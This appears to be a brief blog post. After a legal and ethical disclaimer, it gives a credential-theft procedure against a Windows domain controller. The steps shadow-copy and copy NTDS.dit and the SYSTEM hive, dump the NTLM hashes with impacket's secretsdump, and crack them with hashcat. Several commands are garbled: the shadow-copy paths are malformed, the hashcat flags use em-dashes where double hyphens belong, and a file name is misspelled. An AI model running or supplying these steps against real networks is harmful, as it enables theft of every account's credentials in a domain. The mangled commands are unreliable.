Foreword: the following information is intended as educational contents and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions to perform evasive techniques as that is against the moral character of ethical hacking.
1. Grab the NTDS.dit and systemhive from a domain controller
vssadmin create shadow /for=C:
copy \\?GLOBALROOT\Device\Harddisk\VolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
Reg SAVE HKLM\SYSTEM C:\systemhive
2. Extract the hashes using impacket
git clone https://github.com/fortra/impacket
python setup.py install
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM -hashes lmhash:nthash LOCAL -outputfile pentest-ntlm-extract
3. Decode the hashes using one of these tools:
- OphCrack
- John the Ripper
- HashCat
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username -o ~/pentest/pentest.out — outfile-format=3 ~/pentest/pentest-ntlm-extact.ntds ~/pentest.txt — potfile-path ~/pentest/hashcat.pot
hashcat -m 1000 -w 3 -a 0 -p : — session=all — username — show -o ~/pentest/pentest_1.out — outfile-format=3 ~/pentest/ pentest-ntlm-extact.ntds — potfile-path ~/pentest/pentest.out
- Plain PowerShell
Categories:
